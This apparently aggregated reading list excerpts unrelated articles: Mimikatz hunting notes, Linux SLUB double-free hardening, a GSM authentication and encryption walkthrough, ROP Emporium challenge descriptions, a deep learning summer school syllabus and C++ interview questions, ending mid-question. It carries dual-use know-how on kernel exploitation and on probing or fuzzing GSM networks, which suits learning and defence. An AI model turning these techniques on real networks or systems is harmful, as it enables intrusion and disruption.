New Mimikatz version released: 2.1.1 20170320. Extra DLL loaded: "Winsta.dll". It is a really noisy one, so it does not change our basic fingerprint.

References:
Security Management Components
Authentication Security Components
Exfiltration/Get-VaultCredential.ps1
PowerSploit - Invoke-Mimikatz
Empire Project - Invoke-Mimikatz
Process Hacker - SANS

Wardog at 8:21 PM

Source: https://cyberwardog.blogspot.ro/2017/03/chronicles-of-threat-hunter-hunting-for.html?m=1
12. Protecting the irreplaceable | www.f-secure.com Kimmo Kasslin, 26th Feb 2014 • T-110.6220 Special Course in Information Security Slides: http://www.cse.tkk.fi/fi/opinnot/T-110.6220/2014_Reverse_Engineering_Malware_AND_Mobile_Platform_Security_AND_Software_Security/luennot-files/T1106220.pdf
13. The way I write code, not even I know anymore what, when, why, and how I wrote it, let alone some heuristic analyses...
14. August 30, 2017

Blocking double-free in Linux kernel

On the 7th of August the Positive Technologies expert Alexander Popov gave a talk at SHA2017. SHA stands for Still Hacking Anyway; it is a big outdoor hacker camp in the Netherlands. The slides and recording of Alexander's talk are available. This short article describes some new aspects of Alexander's talk which haven't been covered in our blog.

The general method of exploiting a double-free error is based on turning it into a use-after-free bug. That is usually achieved by allocating a memory region of the same size between the double free() calls (see the diagram below). That technique is called heap spraying. However, in the case of CVE-2017-2636, which Alexander exploited, there are 13 buffers freed straight away. Moreover, the double freeing happens at the beginning. So the usual heap spraying described above doesn't work for that vulnerability. Nevertheless, Alexander managed to turn that state of the system into a use-after-free error. He abused the naive behaviour of SLUB, which is currently the main Linux kernel allocator. It turned out that SLUB allows consecutive double freeing of the same memory region. In contrast, the GNU C library allocator has a "fasttop" check against it, which introduces a relatively small performance penalty. The idea is simple: report an error on freeing a memory region if its address is the same as the last one on the allocator's "freelist". A similar check in SLUB would block some double-free exploits in the Linux kernel (including Alexander's PoC exploit for CVE-2017-2636). So Alexander modified the set_freepointer() function in mm/slub.c and sent the patch to the Linux Kernel Mailing List (LKML). It provoked a lively discussion. The SLUB maintainers didn't like the fact that this check:

introduces some performance penalty for the default SLUB functionality;
duplicates some part of the already existing slub_debug feature;
causes a kernel oops in case of a double-free error.
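To make that freelist check concrete, here is a toy model in Python (purely illustrative; the real patch is C code in set_freepointer() in mm/slub.c) of a free list that rejects an immediate second free of the same address, in the spirit of glibc's "fasttop" check:

```python
class ToyFreelist:
    """Toy model of an allocator free list with a double-free check.

    Mirrors the idea described above: freeing a chunk whose address equals
    the current freelist head is rejected. This illustrates the concept only;
    it is not the kernel's actual data structure or code.
    """
    def __init__(self):
        self._list = []  # the freelist head is the last element

    def free(self, addr):
        # The "fasttop"-style check: is this the chunk we just freed?
        if self._list and self._list[-1] == addr:
            raise RuntimeError("double free detected at %#x" % addr)
        self._list.append(addr)

    def alloc(self):
        # Hand back the most recently freed chunk, if any.
        return self._list.pop() if self._list else None

fl = ToyFreelist()
fl.free(0xdeadbeef)          # first free is fine
try:
    fl.free(0xdeadbeef)      # immediate second free is caught
except RuntimeError as e:
    print(e)
```

Note the check only compares against the list head, which is what keeps its cost low; a double free separated by other frees would slip past it, which is also true of the real "fasttop" heuristic.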
Alexander replied with his arguments:

slub_debug is not enabled in Linux distributions by default (due to the noticeable performance impact);
when the allocator detects a double-free, some severe kernel error has already occurred on behalf of some process, so it might not be worth trusting that process (which might be an exploit).

Finally, Kees Cook helped to negotiate adding Alexander's check behind the CONFIG_SLAB_FREELIST_HARDENED kernel option. So currently the second version of Alexander's patch is accepted and applied to the linux-next branch. It should get to the Linux kernel mainline in the near future. We hope that in the future some popular Linux distributions will ship kernels with the security hardening options (including CONFIG_SLAB_FREELIST_HARDENED) enabled by default.

Author Positive Research at 7:01 AM

Source: http://blog.ptsecurity.com/2017/08/linux-block-double-free.html?
15. DISSECTING GSM ENCRYPTION AND LOCATION UPDATE PROCESS

31/08/2017, Blog, by Rashid Feroze

Have you ever wondered what happens when you turn on your mobile phone? How does it communicate with the network in a secure manner? Almost all of us have read about TCP/IP, and many of us are experts in it, but when it comes to telecom, very few know how it actually works from the inside. What is the message structure in GSM? What kind of encryption does it use? So, today we will be talking in detail about the encryption standards of GSM and how the mobile phone updates its location with the mobile network.

WHAT HAPPENS WHEN YOU TURN ON YOUR CELL PHONE?

When you turn on your cell phone, it first initiates its radio resource and mobility management processes. The phone receives a list of frequencies supported on the neighbouring cells, either from the SIM or from the network. It camps on a cell depending upon the power level and the mobile provider. After that, it performs a location update process towards the network, where the authentication happens. After a successful location update, the mobile phone gets its TMSI and is ready to perform other operations.

Now, let's verify the above statements by having a look at the mobile application debug logs. The screenshots below are from the osmocom mobile application, which simulates a mobile phone running on a PC.

Mobile network information sent by SIM
Camping on a cell
Location update requested, which includes its LAI and TMSI
Location updating accepted and the encryption standard used visible

OBJECTIVE

We will capture GSM data in Wireshark through osmocom-bb and analyse how the entire process of GSM authentication and encryption happens. We will also see how the location update process happens. We have already talked in detail about osmocom-bb and the call setup process in our last blog, so we will skip that part in this blog post.

GSM ENCRYPTION STANDARDS

A5/0 – No encryption used. Listed just for the sake of completeness.
A5/1 – A5/1 is a stream cipher used to provide over-the-air communication privacy in the GSM cellular telephone standard. It is one of seven algorithms which were specified for GSM use. It was initially kept secret, but became public knowledge through leaks and reverse engineering. A number of serious weaknesses in the cipher have been identified.

A5/2 – A5/2 is a stream cipher used to provide voice privacy in the GSM cellular telephone protocol. It was used for export instead of the relatively stronger (but still weak) A5/1. It is one of seven A5 ciphering algorithms which have been defined for GSM use.

A5/3 (KASUMI) – KASUMI is a block cipher used in UMTS, GSM, and GPRS mobile communications systems. In UMTS, KASUMI is used in the confidentiality and integrity algorithms named UEA1 and UIA1, respectively. In GSM, KASUMI is used in the A5/3 key stream generator, and in GPRS in the GEA3 key stream generator.

There are others as well, but the ones mentioned above are the most widely used.

HOW DO GSM AUTHENTICATION AND ENCRYPTION HAPPEN?

Every GSM mobile phone has a Subscriber Identity Module (SIM). The SIM provides the mobile phone with a unique identity through the use of the International Mobile Subscriber Identity (IMSI). The SIM is like a key, without which the mobile phone can't function. It is capable of storing personal phone numbers and short messages. It also stores security-related information such as the A3 authentication algorithm, the A8 ciphering key generating algorithm, the authentication key (Ki) and the IMSI. The mobile station stores the A5 ciphering algorithm.

AUTHENTICATION

The authentication procedure checks the validity of the subscriber's SIM card and then decides whether the mobile station is allowed on a particular network. The network authenticates the subscriber through the use of a challenge-response method. First, a 128-bit random number (RAND) is transmitted to the mobile station over the air interface.
The RAND is passed to the SIM card, where it is sent through the A3 authentication algorithm together with the Ki. The output of the A3 algorithm, the signed response (SRES), is transmitted via the air interface from the mobile station back to the network. On the network side, the AuC compares its value of SRES with the value of SRES it has received from the mobile station. If the two values of SRES match, authentication is successful and the subscriber joins the network. The AuC doesn't actually store a copy of SRES but queries the HLR or the VLR for it, as needed. Generation of SRES

ANONYMITY

When a new GSM subscriber turns on his phone for the first time, its IMSI is transmitted to the AuC on the network. After this, a Temporary Mobile Subscriber Identity (TMSI) is assigned to the subscriber. The IMSI is rarely transmitted after this point unless it is absolutely necessary. This prevents a potential eavesdropper from identifying a GSM user by their IMSI. The user continues to use the same TMSI, depending on how often location updates occur. Every time a location update occurs, the network assigns a new TMSI to the mobile phone. The TMSI is stored along with the IMSI in the network. The mobile station uses the TMSI to report to the network or during call initiation. Similarly, the network uses the TMSI to communicate with the mobile station. The Visitor Location Register (VLR) performs the assignment, administration and update of the TMSI. When the mobile station is switched off, it stores the TMSI on the SIM card to make sure it is available when it is switched on again.

ENCRYPTION AND DECRYPTION OF DATA

GSM makes use of a ciphering key to protect both user data and signaling on the vulnerable air interface. Once the user is authenticated, the RAND (delivered from the network) together with the Ki (from the SIM) is sent through the A8 ciphering key generating algorithm to produce a ciphering key (Kc). The A8 algorithm is stored on the SIM card.
The Kc created by the A8 algorithm is then used with the A5 ciphering algorithm to encipher or decipher the data. The A5 algorithm is implemented in the hardware of the mobile phone, as it has to encrypt and decrypt data on the fly. Generation of encryption key (Kc) Data encryption/decryption using Kc

GSM AUTHORIZATION/ENCRYPTION STEPS

GSM authorization/encryption process

1. When you turn on your mobile for the first time, the MS sends its IMSI to the network.
2. When an MS requests access to the network, the MSC/VLR will normally require the MS to authenticate. The MSC will forward the IMSI to the HLR and request authentication triplets.
3. When the HLR receives the IMSI and the authentication request, it first checks its database to make sure the IMSI is valid and belongs to the network. Once it has accomplished this, it will forward the IMSI and authentication request to the Authentication Center (AuC). The AuC will use the IMSI to look up the Ki associated with that IMSI. The Ki is the individual subscriber authentication key. It is a 128-bit number that is paired with an IMSI when the SIM card is created. The Ki is only stored on the SIM card and at the AuC. The AuC will also generate a 128-bit random number called the RAND. The RAND and the Ki are fed into the A3 encryption algorithm. The output is the 32-bit Signed Response (SRES). The SRES is essentially the "challenge" sent to the MS when authentication is requested. The RAND, SRES, and Kc are collectively known as the triplets. The HLR will send the triplets to the MSC/VLR.
4. The VLR/MSC will then forward only the RAND value to the MS.
5. The MS calculates the SRES using the Ki stored in its SIM and the RAND value sent by the network. The MS sends this SRES value back to the MSC/VLR.
6. The MSC/VLR matches the SRES value with the one that the HLR sent to it. If it matches, it successfully authorizes the MS.
7.
Once authenticated, both the mobile and the network generate Kc using the Ki and the RAND value with the help of the A8 algorithm.
8. The data is then encrypted/decrypted using this uniquely generated key (Kc) with the A5 ciphering algorithm.

LOCATION UPDATE STEPS

Location update process

1. When you turn on your cellphone, it first tells the network that it is here and wants to register to the network. After that, it sends a location update request which includes its previous LAI and its TMSI.
2. After receiving the TMSI, if the TMSI does not exist in its database, the VLR asks for the IMSI, and after receiving the IMSI the VLR asks the HLR for the subscriber info based on that IMSI. Here, if the VLR does not find the TMSI in its database, it will find the address of the old VLR which the MS was connected to using the LAI. A request is sent to the old VLR, requesting the IMSI of the subscriber. The old VLR provides the IMSI corresponding to the TMSI sent by the MS. Note that the IMSI could have been obtained from the mobile, but that is not the preferred option, as the Location Updating Request is sent in the clear, so it could be used to determine the association between the IMSI and the TMSI.
3. The HLR in turn asks the AuC for the triplets for this IMSI. The HLR forwards the triplets (RAND, Kc, SRES) to the VLR/MSC.
4. The MSC will take the details from the VLR and pass only the RAND value to the MS. The MS will compute the SRES again and will send it back to the MSC.
5. The MSC will take the SRES stored in the VLR and compare it to the SRES sent by the MS. If both match, then the location update is successful.
6. After it is successful, an HLR update happens, the HLR updates the MS's current location, and a TMSI is allocated to this MS. Since the TMSI assignment is sent after ciphering is enabled, the relationship between the TMSI and the subscriber cannot be obtained by unauthorized users. The GSM mobile replies back indicating that the new TMSI allocation has been completed.
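The challenge-response flow described above can be sketched in a few lines of Python. Note this is a shape-of-the-protocol illustration only: the real A3/A8 algorithms are operator-specific (COMP128 variants are common) and are not modeled here; HMAC-SHA1 is used purely as a stand-in keyed function, and the SRES/Kc lengths (32 and 64 bits) follow the sizes quoted in the text.

```python
import hashlib
import hmac
import os

def a3_sres(ki: bytes, rand: bytes) -> bytes:
    """Stand-in for A3: derive the 32-bit SRES from Ki and RAND.

    Real networks use operator-chosen algorithms (e.g. COMP128);
    HMAC-SHA1 here only models "a keyed function of Ki and RAND".
    """
    return hmac.new(ki, b"A3" + rand, hashlib.sha1).digest()[:4]

def a8_kc(ki: bytes, rand: bytes) -> bytes:
    """Stand-in for A8: derive the 64-bit ciphering key Kc."""
    return hmac.new(ki, b"A8" + rand, hashlib.sha1).digest()[:8]

# --- AuC side: build the triplet for a subscriber's Ki ---
ki = os.urandom(16)      # 128-bit Ki, shared only by the SIM and the AuC
rand = os.urandom(16)    # 128-bit challenge
triplet = (rand, a3_sres(ki, rand), a8_kc(ki, rand))

# --- MS side: the SIM computes SRES and Kc from the received RAND ---
ms_sres = a3_sres(ki, rand)
ms_kc = a8_kc(ki, rand)

# --- MSC/VLR side: compare the response against the triplet ---
assert ms_sres == triplet[1]   # authentication succeeds
assert ms_kc == triplet[2]     # both ends now share Kc for A5 ciphering
print("authenticated, Kc =", ms_kc.hex())
```

The key point the sketch captures is that Ki never crosses the air interface: only RAND goes out and only SRES comes back, while Kc is derived independently on both sides.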
Now, we will analyze the GSM packets in Wireshark and check what's really happening over the air.

1. Immediate assignment – A radio channel is requested by the MS, and a radio channel is allocated to the MS by the provider. We can also see what kind of control channel (SDCCH/SACCH) is being used here in the channel description.
2. Location update requested – The MS sends a location update request which includes its previous LAI and its TMSI.
3. Authentication request – The VLR/MSC will forward the RAND which it got from the HLR to the MS. We can clearly see the random value that the network sent to the mobile.
4. SRES generation in MS – The MS will generate the SRES value using the A3 authentication algorithm with the help of the Ki stored in the SIM.
5. Authentication response – The MS will send the SRES value which it calculated. We can clearly see the SRES value here.
6. Ciphering mode command – The BSC sends the CIPHERING MODE COMMAND to the mobile. Ciphering has already been enabled, so this message is transmitted with ciphering. The mobile replies to it with mode CIPHERED. We can also see the Ciphering mode complete packet below. We can see that it is using the A5/1 cipher.
7. Location updating accepted – After the successful authentication, the location update happens, where the MS gives its location information to the network.
8. TMSI reallocation complete – The provider will allocate a TMSI to the MS, and this message is encrypted so that no one can sniff the identity of the user (TMSI).
9. Radio channel release – The allocated radio channel is released by the MS.

WHAT NOW?

It was noticed that sometimes operators don't use any encryption at all so that they can handle more load on the network, since the encryption/decryption process increases the overhead. Sometimes there are also issues in the configuration of the authentication process which can be used by an attacker to bypass authentication completely.
GSM security is a huge, largely unexplored field where a lot still has to be explored and done. Now that you know how to analyze GSM data down to the lowest level, you can read, analyze and modify the code of osmocom in order to send arbitrary frames to the network, or from the network to the phone. You can start fuzzing GSM-level protocols in order to find out whether you can actually crash a network device. There is a lot to do, but it requires a very deep understanding of GSM networks and also of the legal aspects around this. I would suggest creating your own GSM network and running your tests on that if you want to go ahead with this. We will be posting more blog posts on GSM. Stay tuned!

REFERENCES

https://www.sans.org/reading-room/whitepapers/telephone/gsm-standard-an-overview-security-317
http://mowais.seecs.nust.edu.pk/encryption.shtml

Source: http://payatu.com/dissecting-gsm-encryption-location-update-process/
16. ROP Emporium

Learn return-oriented programming through a series of challenges designed to teach ROP techniques in isolation, with minimal reverse-engineering and bug-hunting.

Beginner's Guide
All Challenges

ret2win – ret2win means 'return here to win' and it's recommended you start with this challenge. Visit the challenge page by clicking the link above to learn more.
split – Combine elements from the ret2win challenge that have been split apart to beat this challenge. Learn how to use another tool whilst crafting a short ROP chain.
callme – Chain calls to multiple imported methods with specific arguments and see how the differences between 64 & 32 bit calling conventions affect your ROP chain.
write4 – Find and manipulate gadgets to construct an arbitrary write primitive and use it to learn where and how to get your data into process memory.
badchars – Learn to deal with badchars, characters that will not make it into process memory intact or cause other issues such as premature chain termination.
fluff – Sort the useful gadgets from the fluff to construct another write primitive in this challenge. You'll have to get creative though, the gadgets aren't straightforward.
pivot – Stack space is at a premium in this challenge and you'll have to pivot the stack onto a second ROP chain elsewhere in memory to ensure your success.

Source: https://ropemporium.com/
  17. CEH, CISSP?
  18. Deep Learning (DLSS) and Reinforcement Learning (RLSS) Summer School, Montreal 2017 Deep neural networks that learn to represent data in multiple layers of increasing abstraction have dramatically improved the state-of-the-art for speech recognition, object recognition, object detection, predicting the activity of drug molecules, and many other tasks. Deep learning discovers intricate structure in large datasets by building distributed representations, either via supervised, unsupervised or reinforcement learning. The Deep Learning Summer School (DLSS) is aimed at graduate students and industrial engineers and researchers who already have some basic knowledge of machine learning (and possibly but not necessarily of deep learning) and wish to learn more about this rapidly growing field of research. In collaboration with DLSS we will hold the first edition of the Montreal Reinforcement Learning Summer School (RLSS). RLSS will cover the basics of reinforcement learning and show its most recent research trends and discoveries, as well as present an opportunity to interact with graduate students and senior researchers in the field. The school is intended for graduate students in Machine Learning and related fields. Participants should have advanced prior training in computer science and mathematics, and preference will be given to students from research labs affiliated with the CIFAR program on Learning in Machines and Brains. 
Deep Learning Summer School

Machine Learning – Doina Precup
Neural Networks – Hugo Larochelle
Recurrent Neural Networks (RNNs) – Yoshua Bengio
Probabilistic numerics for deep learning – Michael Osborne
Generative Models I – Ian Goodfellow
Theano – Pascal Lamblin
AI Impact on Jobs – Michael Osborne
Introduction to CNNs – Richard Zemel
Structured Models/Advanced Vision – Raquel Urtasun
Torch/PyTorch – Soumith Chintala
Generative Models II – Aaron Courville
Natural Language Understanding – Phil Blunsom
Natural Language Processing – Phil Blunsom
Bayesian Hyper Networks – David Scott Krueger
Gibs Net – Alex Lamb
Pixel GAN autoencoder – Alireza Makhzani
CRNN's – Rémi Leblond, Jean-Baptiste Alayrac
Deep learning in the brain – Blake Aaron Richards
Theoretical Neuroscience and Deep Learning Theory – Surya Ganguli
Marrying Graphical Models & Deep Learning – Max Welling
Learning to Learn – Nando de Freitas
Automatic Differentiation – Matthew James Johnson
Combining Graphical Models and Deep Learning – Matthew James Johnson
Domain Randomization for Cuboid Pose Estimation – Jonathan Tremblay
tbd – Rogers F. Silva
What Would Shannon Do? Bayesian Compression for DL – Karen Ullrich
On the Expressive Efficiency of Overlapping Architectures of Deep Learning – Or Sharir

Reinforcement Learning Summer School

Reinforcement Learning – Joelle Pineau
Policy Search for RL – Pieter Abbeel
TD Learning – Richard S. Sutton
Deep Reinforcement Learning – Hado van Hasselt
Deep Control – Nando de Freitas
Theory of RL – Csaba Szepesvári
Reinforcement Learning – Satinder Singh
Safe RL – Philip S. Thomas
Applications of bandits and recommendation systems – Nicolas Le Roux
Cooperative Visual Dialogue with Deep RL – Devi Parikh, Dhruv Batra

Source: http://videolectures.net/deeplearning2017_montreal/
19. 10 Proven C++ Programming Questions to Ask on Interview

May 25, 2017, Programming Interview Questions

Need to hire C++ developers? Not confident you have the resources to pick the best ones? Don't worry – we're here to help you! We've assembled a team of expert C++ programmers who have worked hard to produce a collection of premade C++ interview questions you can use to bolster your interview process. These C++ programming questions are your secret weapon for face-to-face interviews with prospective hires: answers, explanations, follow-up questions, code snippets. Even if you're not a C++ guru yourself, these questions will let you conduct an interview like one, helping you find the master developers your project demands! So here are the questions and answers:

[Question #1 – std::unique_ptr – Standard library]
[Question #2 – Rule of Five – RAII]
[Question #3 – Finding bugs – Basics]
[Question #4 – Automatic objects – RAII]
[Question #5 – Iterators – Standard library]
[Question #6 – Undefined/unspecified behaviour – Standards]
[Question #7 – Macros – Preprocessor]
[Question #8 – Pointer detector – Templates]
[Question #9 – Insertion sort – Templates]
[Question #10 – Max heap – Algorithms and data structures]
[BONUS – C++ Online Test]

[Question #1 – std::unique_ptr – Standard library]

What happens when a std::unique_ptr is passed by value to a function? For example, in this code snippet:

#include <memory>

auto f(std::unique_ptr<int> ptr) {
    *ptr = 42;
    return ptr;
}

int main() {
    auto ptr = std::make_unique<int>();
    ptr = f(ptr);
}

Why this C++ question? As mentioned before, memory management is a nontrivial burden for the C++ programmer. Smart pointers are helpful in this regard, but they must be well understood in order to be used correctly. This question tests the interview candidate's understanding of one common type of smart pointer.

Possible answers

The correct answer is that this code won't even compile.
The std::unique_ptr type cannot be copied, so passing it as a parameter to a function will fail to compile. To convince the compiler that this is fine, std::move can be used:

ptr = f(std::move(ptr));

Follow-up questions

The interview candidate might think that returning a noncopyable object from a function is also a compiler error, but in this case it's allowed, thanks to copy elision. You can ask the candidate under what conditions copy elision is performed. Of course, the above construct with std::move is less than ideal. Ask the candidate how they would change the function f to make it better. For example, passing a (const) reference to the unique_ptr, or simply a reference to the int pointed to, is probably preferred.

↑↑ Scroll up to the list of C++ questions

[Question #2 – Rule of Five – RAII]

Write a copy constructor, move constructor, copy assignment operator, and move assignment operator for the following class (assume all required headers are already included):

class DirectorySearchResult {
public:
    DirectorySearchResult(
        std::vector<std::string> const& files,
        size_t attributes,
        SearchQuery const* query)
        : files(files), attributes(attributes), query(new SearchQuery(*query)) { }

    ~DirectorySearchResult() { delete query; }

private:
    std::vector<std::string> files;
    size_t attributes;
    SearchQuery* query;
};

Why this interview question? Writing boilerplate like this should be straightforward for any C++ programmer. It is also interesting to see the interview candidate's response to the class design, and see if they question it at all.

Possible answers

Copy constructor:

DirectorySearchResult(DirectorySearchResult const& other)
    : files(other.files),
      attributes(other.attributes),
      query(other.query ? new SearchQuery(*other.query) : nullptr) { }

Here, it's the check for a null pointer to watch out for. As given, the query field cannot be null, but since it's not const this may change later.
Move constructor:

DirectorySearchResult(DirectorySearchResult&& other)
    : files(std::move(other.files)),
      attributes(other.attributes),
      query(other.query) {
    other.query = nullptr;
}

Watch out for correct usage of std::move here, as well as correct "pointer stealing" for the query pointer. It must be nulled, otherwise the object will be deleted by other.

Assignment operator:

DirectorySearchResult& operator=(DirectorySearchResult const& other) {
    if (this == &other) return *this;
    files = other.files;
    attributes = other.attributes;
    delete query;
    query = other.query ? new SearchQuery(*other.query) : nullptr;
    return *this;
}

A pitfall is forgetting to check for self-assignment. It's also worth looking out for a correct function signature, and again handling a null query.

Move assignment operator:

DirectorySearchResult& operator=(DirectorySearchResult&& other) {
    files = std::move(other.files);
    attributes = other.attributes;
    std::swap(query, other.query);
    return *this;
}

As with the move constructor, watch out for correct std::move usage and correct pointer stealing.

Follow-up questions

If the interview candidate hasn't mentioned it already, ask them how the design of this class could be improved. There is no reason for SearchQuery to be a pointer! If we make it a simple object (composition), the default, compiler-generated versions of all four functions would suffice, and the destructor can be removed as well.

↑↑ Scroll up to the list of C++ questions

[Question #3 – Finding bugs – Basics]

There are multiple issues/bugs with the following code. Name as many as you can!

#include <vector.h>

void main(int argc, char** argv) {
    int n;
    if (argc > 1) n = argv[0];
    int* stuff = new int[n];
    vector<int> v(100000);
    delete stuff;
    return 0;
}

Why this programming question? In any programming language, debugging is an essential skill; C++ is no exception.
Being able to debug a program on paper, without looking at its actual runtime behavior, is a useful skill, because the ability to spot incorrect code helps the programmer avoid those mistakes in their own code. Also, it's just plain fun to pick someone else's code apart like that, so this serves as a good warm-up question to put interview candidates at ease.

Possible answers

- vector.h should be vector
- main cannot be void in C++
- argv[0] is the program name, not the first argument
- argv[0] is a pointer to a string, and should not be assigned to n directly
- If argc <= 1, then n is uninitialized, and using it invokes undefined behavior
- vector is used without using namespace std or the std:: prefix
- the vector constructor might throw an exception (std::bad_alloc), causing stuff to be leaked
- stuff points to an array, so it should be deleted using delete[]
- cannot return 0 from a void function

Follow-up questions

For each issue the candidate identifies, ask how it can best be fixed. They should at least mention using a smart pointer or std::vector instead of a raw pointer for stuff.

↑↑ Scroll up to the list of C++ questions

[Question #4 – Automatic objects – RAII]

Explain what an automatic object is (that is, an object with automatic storage duration; also called a "stack object") and what its lifetime is. Explain how an object with dynamic storage duration (heap object) is created, and how it is destroyed. Why is dynamic storage duration discouraged unless necessary, and where is it necessary? What is the inherent problem with raw pointers owning an object? I.e. why is the following considered bad practice, and what standard library construct would you utilize if you needed a dynamically resizable array?

auto p = new int[50];

Show how to initialize a smart pointer, and explain why using one is exception safe.

Why this C++ interview question?
Unlike garbage-collected languages, C++ puts the burden of managing object lifetimes (and thereby memory) on the programmer. There are many ways to do this wrong, some ways to do it approximately right, and few ways to do it entirely "by the book". This series of questions drills the interview candidate on these matters.

Possible answers

A stack object is created at the point of its definition, and lives until the end of its scope (basically, until the closing curly brace of the block it is declared in). A heap object is created with the new operator and lives until delete is called on it. The problem with raw pointers is that ownership is not enforced; it is the responsibility of the programmer to ensure that the object pointed to is deleted, and deleted only once. Advanced candidates might also mention exception safety here, because the possibility of exceptions makes it significantly more complicated to ensure eventual deletion. Unlike its precursor C, C++ offers smart pointers, which are the preferred tool for the job. In particular, to create a "smart pointer" to a dynamically resizable array, std::vector should be used. An example of smart pointer usage:

auto p = std::make_unique<Foo>();

Follow-up questions

Ask the candidate which types of smart pointer exist in the C++ standard library, and what their differences are. Ask which ones can be used in standard containers (e.g. vector, map). You can also ask about the difference between std::make_shared<T>(…) and std::shared_ptr<T>(new T(…)). (The former is more exception-safe when used as a function argument, and might also be implemented more efficiently.)

↑↑ Scroll up to the list of C++ questions

[Question #5 – Iterators – Standard library]

The C++ standard library represents ranges using iterators. What is an iterator, and what different kinds do you know of? Can you explain why the following snippet fails, and why l's iterators aren't suitable?
std::list<int> l {1, 2, 3};
std::sort(l.begin(), l.end());

Explain how the begin and end iterators of a range correspond to its elements and illustrate this by giving the expressions for the begin and end iterators of an array arr.

Why this question?

Standard library containers are the bread and butter of writing algorithms in C++. As in any programming language, one of the most common tasks to perform on a container is to iterate over it. In the C++ standard library, this is accomplished using special-purpose, pointer-like objects called iterators, which come in different types. Asking the candidate about these will reveal how well they understand the concept of iterators, as well as the structure of the underlying container.

Possible answers

An iterator resembles a smart pointer, in the sense that it points to a particular object in a container. But iterators have additional operations besides dereferencing, depending on their type: forward iterators can be incremented, bidirectional iterators can additionally be decremented, and random access iterators can additionally be moved by an arbitrary offset. There are also output iterators, which may for example add objects to the container when assigned to. The reason that the sort call won't work is that it requires a random access iterator, but std::list only provides a bidirectional iterator. By convention, the begin iterator of a collection refers to the first element, and the end iterator refers one past the last element. In other words, they form a half-open range: [begin, end).

Follow-up questions

Ask how the code could be fixed to sort an std::list (e.g. by copying it into a vector first, and back again after sorting). You could even ask the candidate to implement an iterator for a particular data structure (e.g. an array).

↑↑ Scroll up to the list of C++ questions

[Question #6 – Undefined/unspecified behavior – Standards]

Describe what "undefined behavior" means, and how it differs from "unspecified behavior".
Give at least 3 examples of undefined behavior.

Why this C++ question?

The C++ standard does not specify the behavior of the program in every case, and deliberately leaves some things up to compiler vendors. Typically, such cases are to be avoided in practice, so this question tests whether the interview candidate has seen practical examples of such code.

Possible answers

Undefined behavior (UB) means that the standard guarantees nothing about how the program should behave. Unspecified (or implementation-defined) behavior means that the standard requires the behavior to be well-defined, but leaves the definition up to the compiler implementation. This is only the textbook definition; candidates should mention that undefined behavior implies that anything might happen: the program works as intended, it crashes, it causes demons to fly out of your nose. They should mention that UB should always be avoided. They might mention that implementation-defined behavior should probably be avoided as well.

Common examples of undefined behavior include:

- dereferencing a null or wild pointer
- accessing uninitialized memory, like going beyond the bounds of an array or reading an uninitialized local variable
- deleting the same memory twice, or more generally deleting a wild pointer
- arithmetic errors, like division by zero

Follow-up questions

If the candidate doesn't come up with enough UB cases, you can make up some cases of dodgy-looking code and ask them whether it exhibits UB or not.

↑↑ Scroll up to the list of C++ questions

[Question #7 – Macros – Preprocessor]

At what stage of compilation is the preprocessor invoked, and what kind of directives are there?
The following is the declaration of a macro that is used as a constant in some internal API header (B is another entity):

#define A 2048*B

List two issues with this macro: one related to this particular one, for which you should give illustrative example code that breaks the macro, and one related to all macros (hint: think of names).

Why this question?

Even though the preprocessor is typically used in C++ for just a few specific tasks, it is still important to have a basic understanding of its operation and its limitations. The preprocessor makes it very easy to shoot yourself in the foot, so "responsible usage" is essential. As stated, this looks like more of a trivia question than a discussion question, and it's up to the interviewer to dig deeper where necessary.

Possible answers

The preprocessor is invoked on a translation unit ("source file") before actual compilation starts. The output of the preprocessor is passed to the compiler. Even junior candidates should give an answer along these lines. Common preprocessor directives are #include, #define, #ifdef, #ifndef, #if, #else, #elif, #endif. Candidates should be able to list most of these. They might also mention less common directives, such as #undef and #pragma.

The two problems with the #define code are:

Lack of parentheses, in two places. If B is defined as 1+1, then A will not have the value 4096 as expected, but rather 2049. If A is used in an expression like ~A, this will expand to ~2048*B, rather than ~(2048*B), which may have a very different value. The macro should have been defined as:

#define A (2048*(B))

Good candidates will mention that this should probably not have been a macro in the first place, but simply a compile-time constant.

Overly short names. Preprocessor macros all live in a single scope, which spans all files #included afterwards as well, so one has to be very careful about name clashes.
If some unrelated code declared an enum { A, B }, for example, that code would fail to compile with a very confusing error message.

Follow-up questions

It is common for candidates to mention only one of the two pairs of missing parentheses. In this case, prompt them to find more issues. This can also lead to a discussion about why the preprocessor should be avoided when possible, and what the C++-style alternatives are.

↑↑ Scroll up to the list of C++ questions

[Question #8 – Pointer detector – Templates]

Write a templated struct that determines, at compile time, whether its template argument T is a pointer.

Why this C++ programming question?

Template metaprogramming in C++ is an advanced topic, so this question is one of the C++ interview questions for experienced professionals and should not be posed to junior interview candidates. However, for senior candidates, this question can be a good indicator of the depth of their practical experience with the C++ language.

Possible answers

The candidate might mention that std::is_pointer already exists. It could be implemented like this:

template<typename T>
struct is_pointer {
    enum { value = false };
};

template<typename T>
struct is_pointer<T*> {
    enum { value = true };
};

Partial specialization matching will pick the most specific version, so if the type is a pointer, the specialization is selected, which contains an enumerator value with the value true. Otherwise it falls back to the primary template, where value is false. It is also possible to use a static const bool instead of an enum, but this has some drawbacks. The constants would still occupy memory space, so it's not a 100% compile-time construct anymore. Moreover, you'd need to define value outside the template as well, because the in-class initializer is only a declaration, not a definition. It would work in some cases, but would fail if you take the address of value, for example.
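To see the detector in action, it can be exercised entirely at compile time. The following self-contained sketch (an illustration, not part of the original article) also compares the results against the standard trait:

```cpp
#include <type_traits>

// Primary template: by default, T is not a pointer.
template<typename T>
struct is_pointer {
    enum { value = false };
};

// Partial specialization: matches any pointer type T*.
template<typename T>
struct is_pointer<T*> {
    enum { value = true };
};

// Compile-time checks; the results agree with std::is_pointer.
static_assert(!is_pointer<int>::value, "int is not a pointer");
static_assert(is_pointer<int*>::value, "int* is a pointer");
static_assert(is_pointer<char const*>::value == std::is_pointer<char const*>::value,
              "agrees with the standard trait");
```

Because everything happens during compilation, a successful build is itself the test: a wrong specialization would make one of the static_asserts fire.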
Follow-up questions

If the candidate doesn't offer an explanation of their code, ask them for it. You can also ask them about what "most specific" means, i.e. how the compiler chooses between the primary template and its specializations. Please note one more time that this question is one of the advanced C++ interview questions.

↑↑ Scroll up to the list of C++ questions

[Question #9 – Insertion sort – Templates]

Define a function insertion_sort which accepts as first and only argument a reference to an std::array only if the element types are integral (the trait std::is_integral might be of help) and the size of the array is less than 128 elements, and sorts it using insertion sort.

Why this C++ technical interview question?

